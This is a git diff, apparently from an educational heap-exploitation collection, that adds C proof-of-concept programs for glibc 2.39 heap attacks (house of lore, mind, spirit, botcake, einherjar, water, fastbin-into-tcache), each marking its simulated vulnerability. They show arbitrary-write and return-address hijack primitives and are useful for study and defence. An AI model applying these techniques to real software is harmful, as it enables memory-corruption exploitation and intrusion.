first one...\n"); //First call to free will add a reference to the fastbin + free(a); + + fprintf(stderr, "If we free %p again, things will crash because %p is at the top of the free list.\n", a, a); + + fprintf(stderr, "So, instead, we'll free %p.\n", b); + free(b); + + //Calling free(a) twice renders the program vulnerable to Double Free + + fprintf(stderr, "Now, we can free %p again, since it's not the head of the free list.\n", a); + free(a); + + fprintf(stderr, "Now the free list has [ %p, %p, %p ]. 
" + "We'll now carry out our attack by modifying data at %p.\n", a, b, a, a); + unsigned long *d = calloc(1,8); + + fprintf(stderr, "1st calloc(1,8): %p\n", d); + fprintf(stderr, "2nd calloc(1,8): %p\n", calloc(1,8)); + fprintf(stderr, "Now the free list has [ %p ].\n", a); + fprintf(stderr, "Now, we have access to %p while it remains at the head of the free list.\n" + "so now we are writing a fake free size (in this case, 0x20) to the stack,\n" + "so that calloc will think there is a free chunk there and agree to\n" + "return a pointer to it.\n", a); + stack_var[1] = 0x20; + + fprintf(stderr, "Now, we overwrite the first 8 bytes of the data at %p to point right before the 0x20.\n", a); + fprintf(stderr, "Notice that the stored value is not a pointer but a poisoned value because of the safe linking mechanism.\n"); + fprintf(stderr, "^ Reference: https://research.checkpoint.com/2020/safe-linking-eliminating-a-20-year-old-malloc-exploit-primitive/\n"); + unsigned long ptr = (unsigned long)stack_var; + unsigned long addr = (unsigned long) d; + /*VULNERABILITY*/ + *d = (addr >> 12) ^ ptr; + /*VULNERABILITY*/ + + fprintf(stderr, "3rd calloc(1,8): %p, putting the stack address on the free list\n", calloc(1,8)); + + void *p = calloc(1,8); + + fprintf(stderr, "4th calloc(1,8): %p\n", p); + assert((unsigned long)p == (unsigned long)stack_var + 0x10); +} diff --git a/glibc_2.39/fastbin_reverse_into_tcache.c b/glibc_2.39/fastbin_reverse_into_tcache.c new file mode 100644 index 0000000..dfdc382 --- /dev/null +++ b/glibc_2.39/fastbin_reverse_into_tcache.c @@ -0,0 +1,104 @@ +#include +#include +#include +#include + +const size_t allocsize = 0x40; + +int main(){ + setbuf(stdout, NULL); + + printf("\n" + "This attack is intended to have a similar effect to the unsorted_bin_attack,\n" + "except it works with a small allocation size (allocsize <= 0x78).\n" + "The goal is to set things up so that a call to malloc(allocsize) will write\n" + "a large unsigned value to the stack.\n\n"); + printf("After the patch https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=a1a486d70ebcc47a686ff5846875eacad0940e41,\n" + "An heap address leak is needed to perform this attack.\n" + "The same patch also ensures the chunk returned by tcache is properly aligned.\n\n"); + + // Allocate 14 times so that we can free later. + char* ptrs[14]; + size_t i; + for (i = 0; i < 14; i++) { + ptrs[i] = malloc(allocsize); + } + + printf("First we need to free(allocsize) at least 7 times to fill the tcache.\n" + "(More than 7 times works fine too.)\n\n"); + + // Fill the tcache. + for (i = 0; i < 7; i++) free(ptrs[i]); + + char* victim = ptrs[7]; + printf("The next pointer that we free is the chunk that we're going to corrupt: %p\n" + "It doesn't matter if we corrupt it now or later. Because the tcache is\n" + "already full, it will go in the fastbin.\n\n", victim); + free(victim); + + printf("Next we need to free between 1 and 6 more pointers. These will also go\n" + "in the fastbin. If the stack address that we want to overwrite is not zero\n" + "then we need to free exactly 6 more pointers, otherwise the attack will\n" + "cause a segmentation fault. But if the value on the stack is zero then\n" + "a single free is sufficient.\n\n"); + + // Fill the fastbin. + for (i = 8; i < 14; i++) free(ptrs[i]); + + // Create an array on the stack and initialize it with garbage. 
+ size_t stack_var[6]; + memset(stack_var, 0xcd, sizeof(stack_var)); + + printf("The stack address that we intend to target: %p\n" + "It's current value is %p\n", &stack_var[2], (char*)stack_var[2]); + + printf("Now we use a vulnerability such as a buffer overflow or a use-after-free\n" + "to overwrite the next pointer at address %p\n\n", victim); + + //------------VULNERABILITY----------- + + // Overwrite linked list pointer in victim. + // The following operation assumes the address of victim is known, thus requiring + // a heap leak. + *(size_t**)victim = (size_t*)((long)&stack_var[0] ^ ((long)victim >> 12)); + + //------------------------------------ + + printf("The next step is to malloc(allocsize) 7 times to empty the tcache.\n\n"); + + // Empty tcache. + for (i = 0; i < 7; i++) ptrs[i] = malloc(allocsize); + + printf("Let's just print the contents of our array on the stack now,\n" + "to show that it hasn't been modified yet.\n\n"); + + for (i = 0; i < 6; i++) printf("%p: %p\n", &stack_var[i], (char*)stack_var[i]); + + printf("\n" + "The next allocation triggers the stack to be overwritten. The tcache\n" + "is empty, but the fastbin isn't, so the next allocation comes from the\n" + "fastbin. Also, 7 chunks from the fastbin are used to refill the tcache.\n" + "Those 7 chunks are copied in reverse order into the tcache, so the stack\n" + "address that we are targeting ends up being the first chunk in the tcache.\n" + "It contains a pointer to the next chunk in the list, which is why a heap\n" + "pointer is written to the stack.\n" + "\n" + "Earlier we said that the attack will also work if we free fewer than 6\n" + "extra pointers to the fastbin, but only if the value on the stack is zero.\n" + "That's because the value on the stack is treated as a next pointer in the\n" + "linked list and it will trigger a crash if it isn't a valid pointer or null.\n" + "\n" + "The contents of our array on the stack now look like this:\n\n"); + + malloc(allocsize); + + for (i = 0; i < 6; i++) printf("%p: %p\n", &stack_var[i], (char*)stack_var[i]); + + char *q = malloc(allocsize); + printf("\n" + "Finally, if we malloc one more time then we get the stack address back: %p\n", q); + + assert(q == (char *)&stack_var[2]); + + return 0; +} diff --git a/glibc_2.39/house_of_botcake.c b/glibc_2.39/house_of_botcake.c new file mode 100644 index 0000000..0f8e53b --- /dev/null +++ b/glibc_2.39/house_of_botcake.c @@ -0,0 +1,75 @@ +#include +#include +#include +#include +#include +#include + + +int main() +{ + /* + * This attack should bypass the restriction introduced in + * https://sourceware.org/git/?p=glibc.git;a=commit;h=bcdaad21d4635931d1bd3b54a7894276925d081d + * If the libc does not include the restriction, you can simply double free the victim and do a + * simple tcache poisoning + * And thanks to @anton00b and @subwire for the weird name of this technique */ + + // disable buffering so _IO_FILE does not interfere with our heap + setbuf(stdin, NULL); + setbuf(stdout, NULL); + + // introduction + puts("This file demonstrates a powerful tcache poisoning attack by tricking malloc into"); + puts("returning a pointer to an arbitrary location (in this demo, the stack)."); + puts("This attack only relies on double free.\n"); + + // prepare the target + intptr_t stack_var[4]; + puts("The address we want malloc() to return, namely,"); + printf("the target address is %p.\n\n", stack_var); + + // prepare heap layout + puts("Preparing heap layout"); + puts("Allocating 7 chunks(malloc(0x100)) for us to fill up tcache 
list later."); + intptr_t *x[7]; + for(int i=0; i +#include +#include +#include +#include + +int main() +{ + /* + * This modification to The House of Enherjar, made by Huascar Tejeda - @htejeda, works with the tcache-option enabled on glibc-2.32. + * The House of Einherjar uses an off-by-one overflow with a null byte to control the pointers returned by malloc(). + * It has the additional requirement of a heap leak. + * + * After filling the tcache list to bypass the restriction of consolidating with a fake chunk, + * we target the unsorted bin (instead of the small bin) by creating the fake chunk in the heap. + * The following restriction for normal bins won't allow us to create chunks bigger than the memory + * allocated from the system in this arena: + * + * https://sourceware.org/git/?p=glibc.git;a=commit;f=malloc/malloc.c;h=b90ddd08f6dd688e651df9ee89ca3a69ff88cd0c */ + + setbuf(stdin, NULL); + setbuf(stdout, NULL); + + printf("Welcome to House of Einherjar 2!\n"); + printf("Tested on Ubuntu 20.10 64bit (glibc-2.32).\n"); + printf("This technique can be used when you have an off-by-one into a malloc'ed region with a null byte.\n"); + + printf("This file demonstrates the house of einherjar attack by creating a chunk overlapping situation.\n"); + printf("Next, we use tcache poisoning to hijack control flow.\n" + "Because of https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=a1a486d70ebcc47a686ff5846875eacad0940e41," + "now tcache poisoning requires a heap leak.\n"); + + // prepare the target, + // due to https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=a1a486d70ebcc47a686ff5846875eacad0940e41, + // it must be properly aligned. + intptr_t stack_var[0x10]; + intptr_t *target = NULL; + + // choose a properly aligned target address + for(int i=0; i<0x10; i++) { + if(((long)&stack_var[i] & 0xf) == 0) { + target = &stack_var[i]; + break; + } + } + assert(target != NULL); + printf("\nThe address we want malloc() to return is %p.\n", (char *)target); + + printf("\nWe allocate 0x38 bytes for 'a' and use it to create a fake chunk\n"); + intptr_t *a = malloc(0x38); + + // create a fake chunk + printf("\nWe create a fake chunk preferably before the chunk(s) we want to overlap, and we must know its address.\n"); + printf("We set our fwd and bck pointers to point at the fake_chunk in order to pass the unlink checks\n"); + + a[0] = 0; // prev_size (Not Used) + a[1] = 0x60; // size + a[2] = (size_t) a; // fwd + a[3] = (size_t) a; // bck + + printf("Our fake chunk at %p looks like:\n", a); + printf("prev_size (not used): %#lx\n", a[0]); + printf("size: %#lx\n", a[1]); + printf("fwd: %#lx\n", a[2]); + printf("bck: %#lx\n", a[3]); + + printf("\nWe allocate 0x28 bytes for 'b'.\n" + "This chunk will be used to overflow 'b' with a single null byte into the metadata of 'c'\n" + "After this chunk is overlapped, it can be freed and used to launch a tcache poisoning attack.\n"); + uint8_t *b = (uint8_t *) malloc(0x28); + printf("b: %p\n", b); + + int real_b_size = malloc_usable_size(b); + printf("Since we want to overflow 'b', we need the 'real' size of 'b' after rounding: %#x\n", real_b_size); + + /* In this case it is easier if the chunk size attribute has a least significant byte with + * a value of 0x00. The least significant byte of this will be 0x00, because the size of + * the chunk includes the amount requested plus some amount required for the metadata. 
*/ + printf("\nWe allocate 0xf8 bytes for 'c'.\n"); + uint8_t *c = (uint8_t *) malloc(0xf8); + + printf("c: %p\n", c); + + uint64_t* c_size_ptr = (uint64_t*)(c - 8); + // This technique works by overwriting the size metadata of an allocated chunk as well as the prev_inuse bit + + printf("\nc.size: %#lx\n", *c_size_ptr); + printf("c.size is: (0x100) | prev_inuse = 0x101\n"); + + printf("We overflow 'b' with a single null byte into the metadata of 'c'\n"); + // VULNERABILITY + b[real_b_size] = 0; + // VULNERABILITY + printf("c.size: %#lx\n", *c_size_ptr); + + printf("It is easier if b.size is a multiple of 0x100 so you " + "don't change the size of b, only its prev_inuse bit\n"); + + // Write a fake prev_size to the end of b + printf("\nWe write a fake prev_size to the last %lu bytes of 'b' so that " + "it will consolidate with our fake chunk\n", sizeof(size_t)); + size_t fake_size = (size_t)((c - sizeof(size_t) * 2) - (uint8_t*) a); + printf("Our fake prev_size will be %p - %p = %#lx\n", c - sizeof(size_t) * 2, a, fake_size); + *(size_t*) &b[real_b_size-sizeof(size_t)] = fake_size; + + // Change the fake chunk's size to reflect c's new prev_size + printf("\nMake sure that our fake chunk's size is equal to c's new prev_size.\n"); + a[1] = fake_size; + + printf("Our fake chunk size is now %#lx (b.size + fake_prev_size)\n", a[1]); + + // Now we fill the tcache before we free chunk 'c' to consolidate with our fake chunk + printf("\nFill tcache.\n"); + intptr_t *x[7]; + for(int i=0; i %p ].\n", b, pad); + + printf("We overwrite b's fwd pointer using chunk 'd'\n"); + // requires a heap leak because it assumes the address of d is known. + // since house of einherjar also requires a heap leak, we can simply just use it here. + d[0x30 / 8] = (long)target ^ ((long)&d[0x30/8] >> 12); + + // take target out + printf("Now we can cash out the target chunk.\n"); + malloc(0x28); + intptr_t *e = malloc(0x28); + printf("\nThe new chunk is at %p\n", e); + + // sanity check + assert(e == target); + printf("Got control on target/stack!\n\n"); +} diff --git a/glibc_2.39/house_of_lore.c b/glibc_2.39/house_of_lore.c new file mode 100644 index 0000000..a1586e0 --- /dev/null +++ b/glibc_2.39/house_of_lore.c @@ -0,0 +1,137 @@ +/* +Advanced exploitation of the House of Lore - Malloc Maleficarum. +This PoC take care also of the glibc hardening of smallbin corruption. + +[ ... ] + +else + { + bck = victim->bk; + if (__glibc_unlikely (bck->fd != victim)){ + + errstr = "malloc(): smallbin double linked list corrupted"; + goto errout; + } + + set_inuse_bit_at_offset (victim, nb); + bin->bk = bck; + bck->fd = bin; + + [ ... 
] + +*/ + +#include <stdio.h> +#include <stdint.h> +#include <stdlib.h> +#include <string.h> +#include <assert.h> + +void jackpot(){ fprintf(stderr, "Nice jump d00d\n"); exit(0); } + +int main(int argc, char * argv[]){ + + + intptr_t* stack_buffer_1[4] = {0}; + intptr_t* stack_buffer_2[4] = {0}; + void* fake_freelist[7][4]; + + fprintf(stderr, "\nWelcome to the House of Lore\n"); + fprintf(stderr, "This is a revisited version that also bypasses the hardening check introduced by glibc malloc\n"); + fprintf(stderr, "This is tested against Ubuntu 22.04 - 64bit - glibc-2.35\n\n"); + + fprintf(stderr, "Allocating the victim chunk\n"); + intptr_t *victim = malloc(0x100); + fprintf(stderr, "Allocated the first small chunk on the heap at %p\n", victim); + + fprintf(stderr, "Allocating dummy chunks to use up the tcache later\n"); + void *dummies[7]; + for(int i=0; i<7; i++) dummies[i] = malloc(0x100); + + // victim-WORD_SIZE because we need to remove the header size in order to have the absolute address of the chunk + intptr_t *victim_chunk = victim-2; + + fprintf(stderr, "stack_buffer_1 at %p\n", (void*)stack_buffer_1); + fprintf(stderr, "stack_buffer_2 at %p\n", (void*)stack_buffer_2); + + fprintf(stderr, "Create a fake free-list on the stack\n"); + for(int i=0; i<6; i++) { + fake_freelist[i][3] = fake_freelist[i+1]; + } + fake_freelist[6][3] = NULL; + fprintf(stderr, "fake free-list at %p\n", fake_freelist); + + fprintf(stderr, "Create a fake chunk on the stack\n"); + fprintf(stderr, "Set the fwd pointer to the victim_chunk in order to bypass the small-bin corruption check " + "in the second-to-last malloc, which puts a stack address on the smallbin list\n"); + stack_buffer_1[0] = 0; + stack_buffer_1[1] = 0; + stack_buffer_1[2] = victim_chunk; + + fprintf(stderr, "Set the bk pointer to stack_buffer_2 and set the fwd pointer of stack_buffer_2 to point to stack_buffer_1 " + "in order to bypass the small-bin corruption check in the last malloc, which returns a pointer to the fake " + "chunk on the stack\n"); + stack_buffer_1[3] = (intptr_t*)stack_buffer_2; + stack_buffer_2[2] = (intptr_t*)stack_buffer_1; + + fprintf(stderr, "Set the bck pointer of stack_buffer_2 to the fake free-list in order to prevent a crash " + "introduced by the smallbin-to-tcache stashing mechanism\n"); + stack_buffer_2[3] = (intptr_t *)fake_freelist[0]; + + fprintf(stderr, "Allocating another large chunk in order to avoid consolidating the top chunk with " + "the small one during the free()\n"); + void *p5 = malloc(1000); + fprintf(stderr, "Allocated the large chunk on the heap at %p\n", p5); + + + fprintf(stderr, "Freeing dummy chunks\n"); + for(int i=0; i<7; i++) free(dummies[i]); + fprintf(stderr, "Freeing the chunk %p, it will be inserted in the unsorted bin\n", victim); + free((void*)victim); + + fprintf(stderr, "\nIn the unsorted bin the victim's fwd and bk pointers are the unsorted bin's header address (libc addresses)\n"); + fprintf(stderr, "victim->fwd: %p\n", (void *)victim[0]); + fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]); + + fprintf(stderr, "Now performing a malloc that can't be handled by the unsorted bin, nor the small bin\n"); + fprintf(stderr, "This means that the chunk %p will be inserted in front of the SmallBin\n", victim); + + void *p2 = malloc(1200); + fprintf(stderr, "The chunk that can't be handled by the unsorted bin, nor the SmallBin has been allocated to %p\n", p2); + + fprintf(stderr, "The victim chunk has been sorted and its fwd and bk pointers updated\n"); + fprintf(stderr, "victim->fwd: %p\n", (void *)victim[0]); + fprintf(stderr, "victim->bk: 
%p\n\n", (void *)victim[1]); + + //------------VULNERABILITY----------- + + fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->bk pointer\n"); + + victim[1] = (intptr_t)stack_buffer_1; // victim->bk is pointing to stack + + //------------------------------------ + fprintf(stderr, "Now take all dummies chunk in tcache out\n"); + for(int i=0; i<7; i++) malloc(0x100); + + + fprintf(stderr, "Now allocating a chunk with size equal to the first one freed\n"); + fprintf(stderr, "This should return the overwritten victim chunk and set the bin->bk to the injected victim->bk pointer\n"); + + void *p3 = malloc(0x100); + + fprintf(stderr, "This last malloc should trick the glibc malloc to return a chunk at the position injected in bin->bk\n"); + char *p4 = malloc(0x100); + fprintf(stderr, "p4 = malloc(0x100)\n"); + + fprintf(stderr, "\nThe fwd pointer of stack_buffer_2 has changed after the last malloc to %p\n", + stack_buffer_2[2]); + + fprintf(stderr, "\np4 is %p and should be on the stack!\n", p4); // this chunk will be allocated on stack + intptr_t sc = (intptr_t)jackpot; // Emulating our in-memory shellcode + + long offset = (long)__builtin_frame_address(0) - (long)p4; + memcpy((p4+offset+8), &sc, 8); // This bypasses stack-smash detection since it jumps over the canary + + // sanity check + assert((long)__builtin_return_address(0) == (long)jackpot); +} diff --git a/glibc_2.39/house_of_mind_fastbin.c b/glibc_2.39/house_of_mind_fastbin.c new file mode 100644 index 0000000..a8707a3 --- /dev/null +++ b/glibc_2.39/house_of_mind_fastbin.c @@ -0,0 +1,235 @@ +#include +#include +#include +#include +#include +#include + +/* + +House of Mind - Fastbin Variant +========================== + +This attack is similar to the original 'House of Mind' in that it uses +a fake non-main arena in order to write to a new location. This +uses the fastbin for a WRITE-WHERE primitive in the 'fastbin' +variant of the original attack though. The original write for this +can be found at https://dl.packetstormsecurity.net/papers/attack/MallocMaleficarum.txt with a more recent post (by me) at https://maxwelldulin.com/BlogPost?post=2257705984. + +By being able to allocate an arbitrary amount of chunks, a single byte +overwrite on a chunk size and a memory leak, we can control a super +powerful primitive. + +This could be used in order to write a freed pointer to an arbitrary +location (which seems more useful). Or, this could be used as a +write-large-value-WHERE primitive (similar to unsortedbin attack). + Both are interesting in their own right though but the first +option is the most powerful primitive, given the right setting. + +Malloc chunks have a specified size and this size information +special metadata properties (prev_inuse, mmap chunk and non-main arena). +The usage of non-main arenas is the focus of this exploit. For more information +on this, read https://sploitfun.wordpress.com/2015/02/10/understanding-glibc-malloc/. + +First, we need to understand HOW the non-main arena is known from a chunk. + +This the 'heap_info' struct: + +struct _heap_info +{ + mstate ar_ptr; // Arena for this heap. <--- Malloc State pointer + struct _heap_info *prev; // Previous heap. + size_t size; // Current size in bytes. 
+ size_t mprotect_size; // Size in bytes that has been mprotected + char pad[-6 * SIZE_SZ & MALLOC_ALIGN_MASK]; // Proper alignment +} heap_info; +- https://elixir.bootlin.com/glibc/glibc-2.23/source/malloc/arena.c#L48 + +The important thing to note is that the 'malloc_state' within +an arena is grabbed from the ar_ptr, which is the FIRST entry +of this. Malloc_state == mstate == arena + +The main arena has a special pointer. However, non-main arenas (mstate) +are at the beginning of a heap section. They are grabbed with the +following code below, where the user controls the 'ptr' in 'arena_for_chunk': + +#define heap_for_ptr(ptr) \ + ((heap_info *) ((unsigned long) (ptr) & ~(HEAP_MAX_SIZE - 1))) +#define arena_for_chunk(ptr) \ + (chunk_non_main_arena (ptr) ? heap_for_ptr (ptr)->ar_ptr : &main_arena) +- https://elixir.bootlin.com/glibc/glibc-2.23/source/malloc/arena.c#L127 + +This macro takes the 'ptr' and subtracts a large value because the +'heap_info' should be at the beginning of this heap section. Then, +using this, it can find the 'arena' to use. + +The idea behind the attack is to use a fake arena to write pointers +to locations where they should not go but abusing the 'arena_for_chunk' +functionality when freeing a fastbin chunk. + +This POC does the following things: +- Finds a valid arena location for a non-main arena. +- Allocates enough heap chunks to get to the non-main arena location where + we can control the values of the arena data. +- Creates a fake 'heap_info' in order to specify the 'ar_ptr' to be used as the arena later. +- Using this fake arena (ar_ptr), we can use the fastbin to write + to an unexpected location of the 'ar_ptr' with a heap pointer. + +Requirements: +- A heap leak in order to know where the fake 'heap_info' is located at. + - Could be possible to avoid with special spraying techniques +- An unlimited amount of allocations +- A single byte overflow on the size of a chunk + - NEEDS to be possible to put into the fastbin. + - So, either NO tcache or the tcache needs to be filled. +- The location of the malloc state(ar_ptr) needs to have a value larger + than the fastbin size being freed at malloc_state.system_mem otherwise + the chunk will be assumed to be invalid. + - This can be manually inserted or CAREFULLY done by lining up + values in a proper way. +- The NEXT chunk, from the one that is being freed, must be a valid size +(again, greater than 0x20 and less than malloc_state.system_mem) + + +Random perks: +- Can be done MULTIPLE times at the location, with different sized fastbin + chunks. +- Does not brick malloc, unlike the unsorted bin attack. +- Only has three requirements: Infinite allocations, single byte buffer overflowand a heap memory leak. + + + +************************************ +Written up by Maxwell Dulin (Strikeout) +************************************ +*/ + +int main(){ + + printf("House of Mind - Fastbin Variant\n"); + puts("=================================="); + printf("The goal of this technique is to create a fake arena\n"); + printf("at an offset of HEAP_MAX_SIZE\n"); + + printf("Then, we write to the fastbins when the chunk is freed\n"); + printf("This creates a somewhat constrained WRITE-WHERE primitive\n"); + // Values for the allocation information. 
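  /*
   * A small sketch of the arithmetic this relies on (values assumed from the
   * 64-bit defaults quoted above, with HEAP_MAX_SIZE = 0x4000000):
   *
   *   heap_for_ptr(p) == (heap_info *)((unsigned long)p & ~(0x4000000 - 1))
   *
   * e.g. a chunk at 0x56550812f010 maps to a heap_info at 0x565508000000, so
   * whoever controls the memory at that aligned address controls ar_ptr.
   */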
+ int HEAP_MAX_SIZE = 0x4000000; + int MAX_SIZE = (128*1024) - 0x100; // MMap threshold: https://elixir.bootlin.com/glibc/glibc-2.23/source/malloc/malloc.c#L635 + + printf("Find initial location of the heap\n"); + // The target location of our attack and the fake arena to use + uint8_t* fake_arena = malloc(0x1000); + uint8_t* target_loc = fake_arena + 0x30; + + uint8_t* target_chunk = (uint8_t*) fake_arena - 0x10; + + /* + Prepare a valid 'malloc_state' (arena) 'system_mem' + to store a fastbin. This is important because the size + of a chunk is validated for being too small or too large + via the 'system_mem' of the 'malloc_state'. This just needs + to be a value larger than our fastbin chunk. + */ + printf("Set 'system_mem' (offset 0x888) for fake arena\n"); + fake_arena[0x888] = 0xFF; + fake_arena[0x889] = 0xFF; + fake_arena[0x88a] = 0xFF; + + printf("Target Memory Address for overwrite: %p\n", target_loc); + printf("Must set data at HEAP_MAX_SIZE (0x%x) offset\n", HEAP_MAX_SIZE); + + // Calculate the location of our fake arena + uint64_t new_arena_value = (((uint64_t) target_chunk) + HEAP_MAX_SIZE) & ~(HEAP_MAX_SIZE - 1); + uint64_t* fake_heap_info = (uint64_t*) new_arena_value; + + uint64_t* user_mem = malloc(MAX_SIZE); + printf("Fake Heap Info struct location: %p\n", fake_heap_info); + printf("Allocate until we reach a MAX_HEAP_SIZE offset\n"); + + /* + The fake arena must be at a particular offset on the heap. + So, we allocate a bunch of chunks until our next chunk + will be in the arena. This value was calculated above. + */ + while((long long)user_mem < new_arena_value){ + user_mem = malloc(MAX_SIZE); + } + + // Use this later to trigger craziness + printf("Create fastbin sized chunk to be victim of attack\n"); + uint64_t* fastbin_chunk = malloc(0x50); // Size of 0x60 + uint64_t* chunk_ptr = fastbin_chunk - 2; // Point to chunk instead of mem + printf("Fastbin Chunk to overwrite: %p\n", fastbin_chunk); + + printf("Fill up the TCache so that the fastbin will be used\n"); + // Fill the tcache to make the fastbin to be used later. + uint64_t* tcache_chunks[7]; + for(int i = 0; i < 7; i++){ + tcache_chunks[i] = malloc(0x50); + } + for(int i = 0; i < 7; i++){ + free(tcache_chunks[i]); + } + + + /* + Create a FAKE malloc_state pointer for the heap_state + This is the 'ar_ptr' of the 'heap_info' struct shown above. + This is the first entry in the 'heap_info' struct at offset 0x0 + at the heap. + + We set this to the location where we want to write a value to. + The location that gets written to depends on the fastbin chunk + size being freed. This will be between an offset of 0x8 and 0x40 + bytes. For instance, a chunk with a size of 0x20 would be in the + 0th index of fastbinsY struct. When this is written to, we will + write to an offset of 8 from the original value written. + - https://elixir.bootlin.com/glibc/glibc-2.23/source/malloc/malloc.c#L1686 + */ + printf("Setting 'ar_ptr' (our fake arena) in heap_info struct to %p\n", fake_arena); + fake_heap_info[0] = (uint64_t) fake_arena; // Setting the fake ar_ptr (arena) + printf("Target Write at %p prior to exploitation: 0x%x\n", target_loc, *(target_loc)); + + /* + Set the non-main arena bit on the size. + Additionally, we keep the size the same as the original + allocation because there is a sanity check on the fastbin (when freeing) + that the next chunk has a valid size. + + When grabbing the non-main arena, it will use our choosen arena! + From there, it will write to the fastbin because of the size of the + chunk. 
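    For reference, a sketch of the index math involved (glibc's 64-bit
    definition): fastbin_index(sz) = ((unsigned int) sz >> 4) - 2, so this
    0x60-sized chunk lands in fastbinsY[4], i.e. 0x30 bytes into the fake
    arena, as described further below.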
+ + ///// Vulnerability! Overwriting the chunk size + */ + printf("Set non-main arena bit on the fastbin chunk\n"); + puts("NOTE: This keeps the next chunk size valid because the actual chunk size was never changed\n"); + chunk_ptr[1] = 0x60 | 0x4; // Setting the non-main arena bit + + //// End vulnerability + + /* + The offset being written to with the fastbin chunk address + depends on the fastbin BEING used and the malloc_state itself. + In 2.31, the offset from the beginning of the malloc_state + to the fastbinsY array is 0x10. Then, fastbinsY[0x4] is an + additional byte offset of 0x20. In total, the writing offset + from the arena location is 0x30 bytes. + from the arena location to where the write actually occurs. + This is a similar concept to bk - 0x10 from the unsorted + bin attack. + */ + + printf("When we free the fastbin chunk with the non-main arena bit\n"); + printf("set, it will cause our fake 'heap_info' struct to be used.\n"); + printf("This will dereference our fake arena location and write\n"); + printf("the address of the heap to an offset of the arena pointer.\n"); + + printf("Trigger the magic by freeing the chunk!\n"); + free(fastbin_chunk); // Trigger the madness + + // For this particular fastbin chunk size, the offset is 0x28. + printf("Target Write at %p: 0x%llx\n", target_loc, *((unsigned long long*) (target_loc))); + assert(*((unsigned long *) (target_loc)) != 0); +} diff --git a/glibc_2.39/house_of_spirit.c b/glibc_2.39/house_of_spirit.c new file mode 100644 index 0000000..99c16ef --- /dev/null +++ b/glibc_2.39/house_of_spirit.c @@ -0,0 +1,48 @@ +#include +#include +#include + +int main() +{ + setbuf(stdout, NULL); + + puts("This file demonstrates the house of spirit attack."); + puts("This attack adds a non-heap pointer into fastbin, thus leading to (nearly) arbitrary write."); + puts("Required primitives: known target address, ability to set up the start/end of the target memory"); + + puts("\nStep 1: Allocate 7 chunks and free them to fill up tcache"); + void *chunks[7]; + for(int i=0; i<7; i++) { + chunks[i] = malloc(0x30); + } + for(int i=0; i<7; i++) { + free(chunks[i]); + } + + puts("\nStep 2: Prepare the fake chunk"); + // This has nothing to do with fastbinsY (do not be fooled by the 10) - fake_chunks is just a piece of memory to fulfil allocations (pointed to from fastbinsY) + long fake_chunks[10] __attribute__ ((aligned (0x10))); + printf("The target fake chunk is at %p\n", fake_chunks); + printf("It contains two chunks. The first starts at %p and the second at %p.\n", &fake_chunks[1], &fake_chunks[9]); + printf("This chunk.size of this region has to be 16 more than the region (to accommodate the chunk data) while still falling into the fastbin category (<= 128 on x64). The PREV_INUSE (lsb) bit is ignored by free for fastbin-sized chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n"); + puts("... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end."); + printf("Now set the size of the chunk (%p) to 0x40 so malloc will think it is a valid chunk.\n", &fake_chunks[1]); + fake_chunks[1] = 0x40; // this is the size + + printf("The chunk.size of the *next* fake region has to be sane. That is > 2*SIZE_SZ (> 16 on x64) && < av->system_mem (< 128kb by default for the main arena) to pass the nextsize integrity checks. 
No need for fastbin size.\n"); + printf("Set the size of the chunk (%p) to 0x1234 so freeing the first chunk can succeed.\n", &fake_chunks[9]); + fake_chunks[9] = 0x1234; // nextsize + + puts("\nStep 3: Free the first fake chunk"); + puts("Note that the address of the fake chunk must be 16-byte aligned.\n"); + void *victim = &fake_chunks[2]; + free(victim); + + puts("\nStep 4: Take out the fake chunk"); + printf("Now the next calloc will return our fake chunk at %p!\n", &fake_chunks[2]); + printf("malloc can do the trick as well, you just need to do it for 8 times."); + void *allocated = calloc(1, 0x30); + printf("malloc(0x30): %p, fake chunk: %p\n", allocated, victim); + + assert(allocated == victim); +} diff --git a/glibc_2.39/house_of_water.c b/glibc_2.39/house_of_water.c new file mode 100644 index 0000000..f5dca3a --- /dev/null +++ b/glibc_2.39/house_of_water.c @@ -0,0 +1,370 @@ +#include +#include +#include + +/* + * House of Water is a technique for converting a Use-After-Free (UAF) vulnerability into a t-cache + * metadata control primitive, with the added benefit of obtaining a free libc pointer in the + * t-cache metadata as well. + * + * NOTE: This requires 4 bits of bruteforce if the primitive is a write primitive, as the LSB will + * contain 4 bits of randomness. If you can increment integers, no brutefore is required. + * + * By setting the count of t-cache entries 0x3e0 and 0x3f0 to 1, a "fake" heap chunk header of + * size "0x10001" is created. + * + * This fake heap chunk header happens to be positioned above the 0x20 and 0x30 t-cache linked + * address entries, enabling the creation of a fully functional fake unsorted-bin entry. + * + * The correct size should be set for the chunk, and the next chunk's prev-in-use bit + * must be 0. Therefore, from the fake t-cache metadata chunk+0x10000, the appropriate values + * should be written. + * + * Finally, due to the behavior of allocations from unsorted-bins, once t-cache metadata control + * is achieved, a libc pointer can also be inserted into the metadata. This allows the libc pointer + * to be ready for allocation as well. + * + * Technique / house by @udp_ctf - Water Paddler / Blue Water + */ + +void dump_memory(void *addr, unsigned long count) { + for (unsigned int i = 0; i < count*16; i += 16) { + printf("0x%016lx\t\t0x%016lx 0x%016lx\n", (unsigned long)(addr+i), *(long *)(addr+i), *(long *)(addr+i+0x8)); + } +} + +int main(void) { + // Dummy variable + void *_ = NULL; + + // Prevent _IO_FILE from buffering in the heap + setbuf(stdin, NULL); + setbuf(stdout, NULL); + setbuf(stderr, NULL); + + + puts("\n"); + puts("\t=============================="); + puts("\t| STEP 1 |"); + puts("\t=============================="); + puts("\n"); + + // Step 1: Allocate a 0x3d8 and a 0x3e8 to set their respective t-cache counts to 1, + // effectively inserting 0x10001 in to the t-cache above the 0x20 and 0x30 t-cache + // addresses. + puts("Allocate and free a chunk in 0x3e0 and 0x3f0 t-caches. This sets both"); + puts("their t-cache entry counts to 1 and creates a fake 0x10001 header:"); + + void *fake_size_lsb = malloc(0x3d8); + void *fake_size_msb = malloc(0x3e8); + puts("\t- chunks:"); + printf("\t\t* Entry 0x3e0 @ %p\n", fake_size_lsb); + printf("\t\t* Entry 0x3f0 @ %p\n", fake_size_msb); + free(fake_size_lsb); + free(fake_size_msb); + 